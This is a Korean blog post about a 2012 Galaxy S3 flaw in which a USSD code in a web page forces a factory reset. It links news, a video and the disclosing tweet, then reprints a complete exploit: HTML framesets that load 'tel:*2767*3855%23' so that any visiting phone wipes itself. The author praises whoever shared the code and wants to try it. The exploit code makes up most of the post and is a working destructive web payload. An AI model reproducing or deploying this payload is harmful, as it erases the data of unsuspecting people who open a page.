삼성 겔럭시S3 원격삭제 해킹 공격 취약점 뉴스
원본 URL
http://www.yonhapnews.co.kr/economy/2012/09/26/0303000000AKR20120926003800091.HTML?template=5566
이에 대한 해킹 공격 이론 및 시연 동영상 유투브
원본 URL
http://thehackernews.com/2012/09/new-android-exploit-could-force-factory.html
유투브 동영상을 계속 보면
해킹 시연 후 프리젠테이션까지 친절하게 설명해준다
트위터에 올라온 취약점 공개하신 분
내용
the USSD code to factory data reset a Galaxy S3 is *2767*3855# can be triggered from browser like this: <frame src="tel:*2767*3855%23" />
원본 URL
https://twitter.com/pof/status/250540790491787264
그리고
이것은 해킹 exploit source code
facebook 뉴스 링크를 따라 가다 보니 어느 친절한 분이 뎃글로 코드를 날려주심
...이런 착실한 인간 같으니...
복 받으시게나
Exploit Title: Factory Data Reset Galaxy S3
# Google Dork: N/A
# Date: 25/09/2012
# Exploit Author: x86_g
# Software Link: N/A
# Version: Galaxy S3
# Tested on: Galaxy S3
# CVE : N/A
I HAVE BEEN SEE A Trick
USSD code to factory data reset a Galaxy S3 is *2767*3855# can be triggered from browser like this:
-----------------[ source code start ]---------------------------------
<frame src="tel:*2767*3855%23" />
<frameset cols="50%,50%">
<frameset rows="50%,50%">
<frame src="scripttoreset.html">
<frame src="tel:*2767*3855%23">
</frameset>
<frame src="tel:*2767*3855%23">
</frameset>
-----------------[ source code end ]-----------------------------------
-----------------[ source code start ]---------------------------------
scripttoreset.html
<html>
<head>
<title>x86_g Reset Factory * </title>
</head>
<frameset border="1" borderCOLOR="#3A72BC" cols="15%,*">
<frame NAME="HELLO" src="tel:*2767*3855%23" NORESIZE borderCOLOR="#3F85B8" target="main">
<frame NAME="DONKEY" src="ctel:*2767*3855%23" NORESIZE borderCOLOR="#4086C6" target="direita">
<noframes>
<body>
</body>
</noframes>
</frameset>
</html>
-----------------[ source code end ]-----------------------------------
#Greetz to Learners of Curiosity Group
이제 겔럭시S3 를 구해볼까
...역시 폰이 없으니 시도도 못하겠다 ㅡㅜ
댓글 없음:
댓글 쓰기